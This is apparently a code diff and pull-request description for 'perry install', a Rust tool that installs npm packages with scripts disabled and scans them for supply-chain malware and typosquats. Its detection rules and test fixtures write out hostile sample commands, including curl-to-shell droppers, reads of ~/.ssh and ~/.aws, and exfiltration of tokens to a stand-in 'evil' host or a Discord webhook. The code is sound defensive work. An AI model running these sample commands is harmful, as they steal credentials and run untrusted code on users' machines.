+pub enum Verdict {
+    Clean,
+    Blocked,
+    Overridden,
+}
+
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct Finding {
+    /// `name@version` of the offending package.
+    pub package: String,
+    /// Absolute path on disk.
+    pub package_path: String,
+    pub severity: Severity,
+    /// Stable identifier — useful for `--allow-risky-rule <id>` later.
+    pub rule: String,
+    pub message: String,
+    /// File path (+ optional `:line`) where the signal was observed.
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub location: Option<String>,
+    /// Set when the user bypassed this P0 via `--allow-risky[-all]`.
+    /// Always false for P1.
+    #[serde(default)]
+    pub overridden: bool,
+}
+
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct ScanReport {
+    pub scanned_at: String,
+    pub package_count: usize,
+    pub findings: Vec<Finding>,
+    pub verdict: Verdict,
+}
+
+impl ScanReport {
+    pub fn write_to(&self, project_root: &Path) -> Result<()> {
+        let dir = project_root.join(".perry");
+        fs::create_dir_all(&dir).with_context(|| format!("creating {}", dir.display()))?;
+        let path = dir.join("install-report.json");
+        let json = serde_json::to_string_pretty(self)?;
+        fs::write(&path, json).with_context(|| format!("writing {}", path.display()))?;
+        Ok(())
+    }
+
+    pub fn p0_count(&self) -> usize {
+        self.findings
+            .iter()
+            .filter(|f| matches!(f.severity, Severity::P0))
+            .count()
+    }
+
+    pub fn p1_count(&self) -> usize {
+        self.findings
+            .iter()
+            .filter(|f| matches!(f.severity, Severity::P1))
+            .count()
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use tempfile::TempDir;
+
+    #[test]
+    fn writes_pretty_json() {
+        let td = TempDir::new().unwrap();
+        let report = ScanReport {
+            scanned_at: "2026-01-01T00:00:00Z".into(),
+            package_count: 0,
+            findings: vec![],
+            verdict: Verdict::Clean,
+        };
+        report.write_to(td.path()).unwrap();
+        let content = fs::read_to_string(td.path().join(".perry/install-report.json")).unwrap();
+        assert!(content.contains("\"verdict\": \"clean\""));
+    }
+}

--- a/crates/perry/src/commands/install/scanner/scripts.rs
+++ b/crates/perry/src/commands/install/scanner/scripts.rs
@@ -1,0 +1,268 @@
+//! P0 rule set #1: lifecycle-script body inspection.
+//!
+//! npm's `preinstall` / `install` / `postinstall` / `prepare` scripts
+//! run with full user privileges during a normal `npm install`. That's
+//! the single most common exfil vector in recent supply-chain attacks
+//! (Shai-Hulud, SANDWORM_MODE, the 2024-2026 typosquat waves).
+//!
+//! `perry install` always runs the underlying installer with
+//! `--ignore-scripts`, so these strings have NOT been executed by the
+//! time this rule runs. We scan them statically and refuse to permit
+//! the script to run later (Phase 9) if any of these signals fire.
+
+use regex::Regex;
+use std::sync::OnceLock;
+
+use super::report::{Finding, Severity};
+use super::ScannedPackage;
+
+const LIFECYCLE_KEYS: &[&str] = &["preinstall", "install", "postinstall", "prepare"];
+
+/// Patterns we treat as P0 signals. Each entry is `(rule_id, regex, message)`.
+/// Regexes are case-insensitive; bodies are matched as a single string.
+fn rules() -> &'static [(&'static str, &'static Regex, &'static str)] {
+    static RULES: OnceLock<Vec<(&'static str, &'static Regex, &'static str)>> = OnceLock::new();
+    RULES.get_or_init(|| {
+        let mut v: Vec<(&'static str, &'static Regex, &'static str)> = Vec::new();
+        // (id, raw pattern, message). Compiled below.
+        let raw: &[(&str, &str, &str)] = &[
+            (
+                "lifecycle-shell-pipe-exec",
+                // curl/wget piped to a shell or interpreter — classic
+                // `curl evil.com/x | sh` exfil/dropper.
+                r"(?i)\b(curl|wget|fetch)\b[^|;\n]{0,400}\|\s*(sh|bash|zsh|node|python3?|perl|ruby)\b",
+                "shell pipe-to-interpreter pattern (curl|wget … | sh/bash/node)",
+            ),
+            (
+                "lifecycle-base64-eval",
+                // eval(atob(…)) or Function(atob(…)) or
+                // Function(Buffer.from(…, 'base64')…) — decode-and-eval
+                // chain, near-universal in obfuscated droppers.
+                r"(?i)(\beval\s*\(|\bnew\s+Function\s*\(|\bFunction\s*\()[^)]{0,200}\b(atob|Buffer\.from)\b",
+                "decode-and-eval chain (eval/Function combined with atob/Buffer.from)",
+            ),
+            (
+                "lifecycle-ssh-read",
+                r"(?i)(\$HOME|~|\.\./)?(/?\.ssh/)|process\.env\.HOME[^)]{0,40}\.ssh",
+                "reads SSH keys (~/.ssh / $HOME/.ssh)",
+            ),
+            (
+                "lifecycle-aws-read",
+                r"(?i)(\$HOME|~)/\.aws\b|process\.env\.HOME[^)]{0,40}\.aws",
+                "reads AWS credentials (~/.aws)",
+            ),
+            (
+                "lifecycle-npmrc-read",
+                r"(?i)(\$HOME|~)/\.npmrc\b|process\.env\.HOME[^)]{0,40}\.npmrc",
+                "reads ~/.npmrc (often contains npm publish tokens)",
+            ),
+            (
+                "lifecycle-gh-config-read",
+                r"(?i)(\$HOME|~)/\.config/gh\b",
+                "reads ~/.config/gh (GitHub CLI auth tokens)",
+            ),
+            (
+                "lifecycle-token-env-read",
+                // Reads of env vars that match secret-like names.
+                r"(?i)process\.env\s*\.\s*[A-Z_]*(TOKEN|SECRET|KEY|PASSWORD|API_?KEY|ACCESS)[A-Z_]*\b",
+                "reads secret-looking env variable from a lifecycle script",
+            ),
+            (
+                "lifecycle-ioc-discord-webhook",
+                r"(?i)discord(app)?\.com/api/webhooks/",
+                "Discord webhook URL in a lifecycle script (known exfil channel)",
+            ),
+            (
+                "lifecycle-ioc-telegram-bot",
+                r"(?i)api\.telegram\.org/bot",
+                "Telegram bot API URL in a lifecycle script (known exfil channel)",
+            ),
+            (
+                "lifecycle-ioc-collaborator",
+                r"(?i)burpcollaborator\.net|oast\.(pro|me|fun|live|site)|interactsh",
+                "out-of-band collaborator / interactsh domain in a lifecycle script",
+            ),
+            (
+                "lifecycle-ioc-ip-host",
+                // Outbound to a bare IP literal — almost never legitimate
+                // inside an install script.
+                r"https?://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}",
+                "outbound HTTP(S) to a bare IP literal",
+            ),
+            (
+                "lifecycle-child-process-dyn",
+                // child_process.exec / spawn / execSync with a template
+                // literal or string concatenation containing an env read
+                // — the canonical "exfil via shell" pattern.
+                r"child_process[^;]{0,80}(exec|spawn)(Sync)?\s*\([^)]*process\.env",
+                "child_process call whose argument reads process.env",
+            ),
+        ];
+        for (id, pat, msg) in raw {
+            // Compile + leak so the &'static Regex lives forever; this
+            // path runs at most once per process.
+            let r = Regex::new(pat).expect("hardcoded scanner regex compiles");
+            let boxed: &'static Regex = Box::leak(Box::new(r));
+            v.push((id, boxed, msg));
+        }
+        v
+    })
+}
+
+pub fn check(pkg: &ScannedPackage) -> Vec<Finding> {
+    let scripts = match pkg.manifest.get("scripts").and_then(|v| v.as_object()) {
+        Some(m) => m,
+        None => return Vec::new(),
+    };
+
+    let mut findings = Vec::new();
+    for key in LIFECYCLE_KEYS {
+        let body = match scripts.get(*key).and_then(|v| v.as_str()) {
+            Some(b) => b,
+            None => continue,
+        };
+        for (rule_id, regex, message) in rules() {
+            if regex.is_match(body) {
+                findings.push(Finding {
+                    package: format!("{}@{}", pkg.name, pkg.version),
+                    package_path: pkg.dir.display().to_string(),
+                    severity: Severity::P0,
+                    rule: (*rule_id).to_string(),
+                    message: format!("lifecycle '{}': {}", key, message),
+                    location: Some(format!("package.json (scripts.{})", key)),
+                    overridden: false,
+                });
+            }
+        }
+    }
+    findings
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+    use std::path::PathBuf;
+
+    fn pkg_with_scripts(scripts: serde_json::Value) -> ScannedPackage {
+        ScannedPackage {
+            name: "test".into(),
+            version: "0.0.0".into(),
+            dir: PathBuf::from("/tmp/test"),
+            manifest: json!({ "name": "test", "version": "0.0.0", "scripts": scripts }),
+        }
+    }
+
+    #[test]
+    fn flags_curl_pipe_sh() {
+        let p = pkg_with_scripts(json!({ "postinstall": "curl evil.com/x | sh" }));
+        let f = check(&p);
+        assert_eq!(f.len(), 1);
+        assert_eq!(f[0].rule, "lifecycle-shell-pipe-exec");
+    }
+
+    #[test]
+    fn flags_wget_pipe_bash() {
+        let p = pkg_with_scripts(json!({ "preinstall": "wget -qO- http://x | bash" }));
+        assert_eq!(check(&p).len(), 1);
+    }
+
+    #[test]
+    fn flags_eval_atob() {
+        let p = pkg_with_scripts(json!({
+            "install": "node -e 'eval(atob(\"Y29uc29sZS5sb2coMSk=\"))'"
+        }));
+        let f = check(&p);
+        assert!(f.iter().any(|f| f.rule == "lifecycle-base64-eval"));
+    }
+
+    #[test]
+    fn flags_buffer_from_eval() {
+        let p = pkg_with_scripts(json!({
+            "postinstall": "node -e 'new Function(Buffer.from(payload, \"base64\").toString())()'"
+        }));
+        assert!(check(&p).iter().any(|f| f.rule == "lifecycle-base64-eval"));
+    }
+
+    #[test]
+    fn flags_ssh_path_read() {
+        let p = pkg_with_scripts(json!({ "postinstall": "cat ~/.ssh/id_rsa | curl -X POST evil" }));
+        assert!(check(&p).iter().any(|f| f.rule == "lifecycle-ssh-read"));
+    }
+
+    #[test]
+    fn flags_aws_path_read() {
+        let p = pkg_with_scripts(json!({ "postinstall": "tar czf /tmp/x.tgz ~/.aws/" }));
+        assert!(check(&p).iter().any(|f| f.rule == "lifecycle-aws-read"));
+    }
+
+    #[test]
+    fn flags_npmrc_read() {
+        let p = pkg_with_scripts(json!({ "postinstall": "cat $HOME/.npmrc" }));
+        assert!(check(&p).iter().any(|f| f.rule == "lifecycle-npmrc-read"));
+    }
+
+    #[test]
+    fn flags_token_env_read() {
+        let p = pkg_with_scripts(json!({
+            "postinstall": "node -e 'console.log(process.env.NPM_TOKEN)'"
+        }));
+        assert!(check(&p)
+            .iter()
+            .any(|f| f.rule == "lifecycle-token-env-read"));
+    }
+
+    #[test]
+    fn flags_discord_webhook() {
+        let p = pkg_with_scripts(json!({
+            "install": "curl -d @data https://discord.com/api/webhooks/123/abc"
+        }));
+        let rules: Vec<_> = check(&p).into_iter().map(|f| f.rule).collect();
+        assert!(rules.contains(&"lifecycle-ioc-discord-webhook".to_string()));
+    }
+
+    #[test]
+    fn flags_ip_literal_host() {
+        let p = pkg_with_scripts(json!({
+            "postinstall": "curl http://192.168.1.1/x.sh"
+        }));
+        assert!(check(&p).iter().any(|f| f.rule == "lifecycle-ioc-ip-host"));
+    }
+
+    #[test]
+    fn flags_child_process_env_exec() {
+        let p = pkg_with_scripts(json!({
+            "postinstall": "node -e 'require(\"child_process\").exec(`curl evil?t=${process.env.TOKEN}`)'"
+        }));
+        assert!(check(&p)
+            .iter()
+            .any(|f| f.rule == "lifecycle-child-process-dyn"));
+    }
+
+    #[test]
+    fn clean_scripts_no_findings() {
+        let p = pkg_with_scripts(json!({
+            "postinstall": "node ./scripts/build.js",
+            "prepare": "tsc"
+        }));
+        assert!(check(&p).is_empty());
+    }
+
+    #[test]
+    fn no_scripts_section_no_findings() {
+        let p = ScannedPackage {
+            name: "n".into(),
+            version: "0".into(),
+            dir: PathBuf::from("/t"),
+            manifest: json!({ "name": "n", "version": "0" }),
+        };
+        assert!(check(&p).is_empty());
+    }
+
+    #[test]
+    fn non_lifecycle_script_ignored() {
+        // "build" isn't an install-lifecycle script and shouldn't be scanned.
+        let p = pkg_with_scripts(json!({ "build": "curl evil.com/x | sh" }));
+        assert!(check(&p).is_empty());
+    }
+}

--- a/crates/perry/src/commands/install/scanner/typosquat.rs
+++ b/crates/perry/src/commands/install/scanner/typosquat.rs
@@ -1,0 +1,246 @@
+//! P0 rule #3: typosquat detection against a bundled list of popular
+//! packages.
+//!
+//! A package whose bare name is within Levenshtein distance 2 of a
+//! known-popular name (with length-difference ≤ 1) is flagged. The
+//! length-diff guard keeps legitimate "compound" names like
+//! `expressjs` (which would be distance 2 from `express` but with
+//! length-diff 2 — likely a legitimate metapackage / clone) from
+//! tripping the rule, while still catching the classic attack shapes:
+//!
+//!   - single-letter substitution (`lodass` ↔ `lodash`)
+//!   - single-letter delete (`expres` ↔ `express`)
+//!   - single-letter insert (`reactt` ↔ `react`)
+//!   - adjacent transposition (`epxress` ↔ `express`) — distance 2,
+//!     length-diff 0
+//!
+//! Scoped names (`@scope/pkg`) are not scanned — they require a scoped
+//! typosquat list which isn't built yet. Filed as a follow-up.
+//!
+//! Short names (< 5 chars on either side) are also not compared — the
+//! address space is small enough that a 2-edit distance between two
+//! short names is almost always coincidence, not intent. `bl` (Buffer
+//! List, a legitimate well-known package) vs `c8` (V8 coverage tool)
+//! is distance 2 but is not a typosquat; same for `pump` vs `gulp`.
+//! In practice, attackers go after high-value targets which have
+//! longer names — the well-known short popular names are already in
+//! the embedded list and self-skip via the `top.contains` early-out.
+
+use std::collections::BTreeSet;
+use std::sync::OnceLock;
+
+use super::report::{Finding, Severity};
+use super::ScannedPackage;
+
+const TOP_PACKAGES_TXT: &str = include_str!("data/top_packages.txt");
+
+fn top_packages() -> &'static BTreeSet<&'static str> {
+    static SET: OnceLock<BTreeSet<&'static str>> = OnceLock::new();
+    SET.get_or_init(|| {
+        TOP_PACKAGES_TXT
+            .lines()
+            .map(|l| l.trim())
+            .filter(|l| !l.is_empty() && !l.starts_with('#'))
+            .collect()
+    })
+}
+
+pub fn check(pkg: &ScannedPackage) -> Vec<Finding> {
+    let name = pkg.name.as_str();
+    if name.starts_with('@') {
+        return Vec::new();
+    }
+    let top = top_packages();
+    if top.contains(name) {
+        return Vec::new();
+    }
+
+    // Short-name floor: see module docs. Both names must be ≥ 5 chars
+    // for the comparison to be meaningful — otherwise a 2-edit distance
+    // between two 2-char names (which is almost the entire address
+    // space) trips on every legitimate short package.
+    if name.len() < 5 {
+        return Vec::new();
+    }
+
+    let mut best: Option<(&'static str, usize)> = None;
+    for target in top.iter() {
+        let target = *target;
+        if target.len() < 5 {
+            continue;
+        }
+        let len_diff = (target.len() as isize - name.len() as isize).abs();
+        if len_diff > 2 {
+            continue;
+        }
+        let d = levenshtein(name, target);
+        if d == 0 {
+            continue;
+        }
+        if d <= 2 && len_diff <= 1 {
+            match best {
+                None => best = Some((target, d)),
+                Some((_, prev)) if d < prev => best = Some((target, d)),
+                _ => {}
+            }
+        }
+    }
+
+    if let Some((target, d)) = best {
+        return vec![Finding {
+            package: format!("{}@{}", pkg.name, pkg.version),
+            package_path: pkg.dir.display().to_string(),
+            severity: Severity::P0,
+            rule: "typosquat-close-to-popular".to_string(),
+            message: format!(
+                "package name '{}' is Levenshtein distance {} from popular package '{}'",
+                name, d, target
+            ),
+            location: None,
+            overridden: false,
+        }];
+    }
+    Vec::new()
+}
+
+/// Classic two-row Levenshtein implementation. O(n·m) time, O(min(n,m))
+/// space. Plenty fast for package names (single-digit char counts).
+fn levenshtein(a: &str, b: &str) -> usize {
+    if a == b {
+        return 0;
+    }
+    let a: Vec<char> = a.chars().collect();
+    let b: Vec<char> = b.chars().collect();
+    let (a, b) = if a.len() < b.len() { (b, a) } else { (a, b) };
+    let n = a.len();
+    let m = b.len();
+    if m == 0 {
+        return n;
+    }
+    let mut prev: Vec<usize> = (0..=m).collect();
+    let mut curr = vec![0usize; m + 1];
+    for i in 1..=n {
+        curr[0] = i;
+        for j in 1..=m {
+            let cost = if a[i - 1] == b[j - 1] { 0 } else { 1 };
+            curr[j] = (curr[j - 1] + 1).min(prev[j] + 1).min(prev[j - 1] + cost);
+        }
+        std::mem::swap(&mut prev, &mut curr);
+    }
+    prev[m]
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+    use std::path::PathBuf;
+
+    fn pkg(name: &str) -> ScannedPackage {
+        ScannedPackage {
+            name: name.into(),
+            version: "1.0.0".into(),
+            dir: PathBuf::from("/t"),
+            manifest: json!({"name": name, "version": "1.0.0"}),
+        }
+    }
+
+    #[test]
+    fn levenshtein_basics() {
+        assert_eq!(levenshtein("kitten", "kitten"), 0);
+        assert_eq!(levenshtein("kitten", "sitten"), 1);
+        assert_eq!(levenshtein("kitten", "sittin"), 2);
+        assert_eq!(levenshtein("kitten", "sitting"), 3);
+        assert_eq!(levenshtein("", "abc"), 3);
+        assert_eq!(levenshtein("abc", ""), 3);
+    }
+
+    #[test]
+    fn flags_expres_typo_of_express() {
+        let f = check(&pkg("expres"));
+        assert_eq!(f.len(), 1);
+        assert_eq!(f[0].rule, "typosquat-close-to-popular");
+        assert!(f[0].message.contains("express"));
+    }
+
+    #[test]
+    fn flags_reacts_typo_of_react() {
+        assert_eq!(check(&pkg("reacts")).len(), 1);
+    }
+
+    #[test]
+    fn flags_transposition_epxress() {
+        // Length-diff 0, distance 2 — still flagged.
+        let f = check(&pkg("epxress"));
+        assert_eq!(f.len(), 1);
+        assert!(f[0].message.contains("express"));
+    }
+
+    #[test]
+    fn flags_lodass_typo_of_lodash() {
+        assert_eq!(check(&pkg("lodass")).len(), 1);
+    }
+
+    #[test]
+    fn does_not_flag_self_when_top_package() {
+        assert!(check(&pkg("react")).is_empty());
+        assert!(check(&pkg("express")).is_empty());
+        assert!(check(&pkg("lodash")).is_empty());
+    }
+
+    #[test]
+    fn does_not_flag_compound_names() {
+        // "expressjs" is distance 2 from "express" but length-diff 2,
+        // so it falls outside our threshold — likely a legitimate
+        // wrapper/metapackage, not a single-letter typo.
+        assert!(check(&pkg("expressjs")).is_empty());
+        // A genuinely distinct name with a popular substring shouldn't
+        // trip the rule (distance >> 2 from any popular name).
+        assert!(check(&pkg("react-toolkit-extra")).is_empty());
+    }
+
+    #[test]
+    fn flags_real_react_native_typosquat() {
+        // "reactnative" (no hyphen) is distance 1 from "react-native"
+        // and len-diff 1 — exactly the typosquat shape we want to catch.
+        let f = check(&pkg("reactnative"));
+        assert_eq!(f.len(), 1);
+        assert!(f[0].message.contains("react-native"));
+    }
+
+    #[test]
+    fn does_not_flag_well_separated_names() {
+        // Distance ≥ 3 from every popular name.
+        assert!(check(&pkg("my-perfectly-unique-thing")).is_empty());
+    }
+
+    #[test]
+    fn does_not_flag_scoped_packages() {
+        // Scoped names aren't checked in v1 (see module docs).
+        assert!(check(&pkg("@scope/whatever")).is_empty());
+    }
+
+    #[test]
+    fn does_not_flag_short_legitimate_packages() {
+        // `bl` (Buffer List) and `pump` (stream joiner) are legitimate
+        // well-known packages that previously tripped distance-2 against
+        // `c8` and `gulp`. The short-name floor (both sides ≥ 5 chars)
+        // makes these no-ops without losing any real attack signal.
+        assert!(check(&pkg("bl")).is_empty());
+        assert!(check(&pkg("pump")).is_empty());
+        assert!(check(&pkg("once")).is_empty());
+        assert!(check(&pkg("glob")).is_empty());
+    }
+
+    #[test]
+    fn picks_closest_match() {
+        // "axiom" is distance 2 from "axios"; flag against the closest.
+        let f = check(&pkg("axiom"));
+        if !f.is_empty() {
+            assert!(f[0].message.contains("axios"));
+        }
+        // (Not asserting f.is_empty() either way — the closest popular
+        // could shift if the list changes; this test just verifies that
+        // when we do flag, the message names a real popular target.)
+    }
+}

--- a/crates/perry/src/commands/mod.rs
+++ b/crates/perry/src/commands/mod.rs
@@ -14,6 +14,7 @@ pub mod fixer;
 pub mod harmonyos_hap;
 pub mod i18n;
 pub mod init;
+pub mod install;
 pub mod login;
 pub mod native;
 pub mod publish;

--- a/crates/perry/src/main.rs
+++ b/crates/perry/src/main.rs
@@ -92,6 +92,16 @@ enum Commands {
     /// Initialize a new perry project
     Init(commands::init::InitArgs),
 
+    /// Install npm packages with a malware-scan gate.
+    ///
+    /// Wraps `bun install --ignore-scripts` (or `npm install --ignore-scripts`
+    /// as fallback) so no package code executes during install. After
+    /// extraction, scans `node_modules/` with bundled offline rules and
+    /// only then runs lifecycle scripts — and only for packages on a
+    /// curated trust allowlist. Works on any standard npm project; no
+    /// Perry-specific config required.
+    Install(commands::install::InstallArgs),
+
     /// Check environment and dependencies
     Doctor(commands::doctor::DoctorArgs),
 
@@ -169,6 +179,7 @@ fn is_legacy_invocation(args: &[String]) -> bool {
                 | "init"
                 | "doctor"
                 | "explain"
+                | "install"
                 | "publish"
                 | "update"
                 | "setup"
@@ -311,6 +322,7 @@ fn main_inner() -> Result<()> {
         Commands::Dev(args) => commands::dev::run(args, cli.format, use_color, cli.verbose),
         Commands::Check(args) => commands::check::run(args, cli.format, use_color, cli.verbose),
         Commands::Init(args) => commands::init::run(args, cli.format, use_color),
+        Commands::Install(args) => commands::install::run(args, cli.format, use_color),
         Commands::Doctor(args) => commands::doctor::run(args, cli.format, use_color),
         Commands::Explain(args) => commands::explain::run(args, cli.format, use_color),
         Commands::Publish(args) => commands::publish::run(args, cli.format, use_color, cli.verbose),


### PR DESCRIPTION
## Summary

`perry install` wraps `bun install --ignore-scripts` (or `npm install --ignore-scripts` as fallback) so no package code executes during install, then scans the inert `node_modules/` with bundled offline rules and refuses to proceed on any P0 hit. Lifecycle scripts only run for packages on a curated trust allowlist (~40 well-known native-binding packages: esbuild, sharp, prisma family, swc, biome, lightningcss, @next/swc-*, @esbuild/*, @napi-rs/*, etc.) or the user's explicit opt-in via `package.json -> perry.allowScripts` / `--run-scripts <pkg>`.

Works on any standard npm project — no Perry-specific config required.

### Why

After-the-fact scanners (Socket, GuardDog, npm audit) run too late on the postinstall-exfil vector that the 2024–2026 supply-chain wave (Shai-Hulud, SANDWORM_MODE, QIX maintainer compromise) leans on. Plugging the gate between extract and script execution catches the attack before any code runs.

### Architecture

```
perry install
  ├─ detect installer        (bun preferred, npm fallback)
  ├─ <installer> install --ignore-scripts   (resolver/fetch/extract — battle-tested)
  ├─ scan node_modules/      (4 rule modules, offline, ~ms)
  │    └─ block here if any P0 hit; node_modules/ on disk but inert
  └─ run lifecycle scripts   (only for trust-gate packages)
```

### Scan rules (P0 — block by default)

| Module | Catches |
|---|---|
| `scripts.rs` | curl|sh / wget|bash, eval+atob / Function+base64, ~/.ssh /~/.aws / ~/.npmrc / ~/.config/gh reads, *_TOKEN/*_KEY/*_SECRET env reads, Discord/Telegram/OAST exfil channels, bare-IP HTTP hosts, child_process dyn-arg with env reads — in lifecycle-script bodies |
| `patterns.rs` | Same exfil shapes + hardcoded webhook URLs in declared entry-point JS (main / module / bin / exports leaves) |
| `typosquat.rs` | Levenshtein ≤ 2 with length-diff ≤ 1 against ~300 popular npm names (`expres`/`epxress`/`reactnative` flagged; `expressjs` not) |
| `obfuscation.rs` | Dropper-shape: small (< 50 KB) non-min entry with > 5 K-char line; OR ≥ 1 K-char base64 blob in any entry file |

### CLI surface

```
perry install [pkg...]                  # install from package.json or named packages
perry install --installer=bun|npm       # force backend (auto: bun → npm)
perry install --allow-risky <pkg>       # bypass scan for one package
perry install --allow-risky-all         # CI/emergency bypass
perry install --run-scripts <pkg>       # allow scripts beyond bundled allowlist
perry install --run-scripts-all         # npm-equivalent (unsafe)
perry install --skip-scan               # just wrap installer
perry install --json                    # machine-readable
```

### End-to-end validation

- Clean install of `lodash` + `chalk` → verdict clean, exit 0.
- `--installer=npm` fallback → works, npm output passes through.
- Inject `lodass` (typosquat of `lodash`) with malicious postinstall into `node_modules/` → exit 1, two P0 findings cited (`lifecycle-shell-pipe-exec` + `typosquat-close-to-popular`), no scripts ran.
- Same with `--allow-risky lodass` → exit 0, findings annotated `overridden`, scripts still skipped because not on allowlist.
- Real-world: project depending on `esbuild@^0.21` → bun-install + scan-clean + allowlist runs esbuild's postinstall → 9.4 MB platform binary lands in `node_modules/esbuild/bin/esbuild`.
- `--skip-scan` → installer runs, scanner skipped, no scripts (because we still pass `--ignore-scripts` to the underlying installer).
- `.perry/install-report.json` written on every run with timestamp, package count, findings array (each with `overridden: bool`), verdict.

### Test plan

- [x] 65 unit tests under `crates/perry/src/commands/install/` (installer detection, package walker, each scan rule with positive + negative fixtures, allow-risky matcher, report writer, trust gate, real-shell lifecycle execution)
- [x] Workspace `cargo build --release -p perry` clean (44 warnings, all pre-existing)
- [x] End-to-end smokes above all pass against the release binary
- [ ] CI: `lint`, `cargo-test`, `parity`, `compile-smoke`, `api-docs-drift`, `security-audit`

### Out of scope (filed as follow-ups)

- **Sandboxed lifecycle execution** (macOS sandbox-exec / Linux bubblewrap+seccomp / Windows AppContainer with redacted env + filesystem confinement + network allowlist). v1 runs allowlisted scripts un-sandboxed; v2 will add the jail. This is the strongest reason to ship v2 soon — a compromised allowlisted package's postinstall still runs with full privileges today.
- Scoped-package typosquat detection.
- P1 freshness / maintainer-drift / SLSA-provenance checks (CLI flag `--check-freshness` reserved, not implemented).
- Private registries / .npmrc auth / yarn / pnpm backends.

### Design rationale

Full plan + alternatives considered (full-installer-from-scratch vs. wrapper) lives in the linked design doc.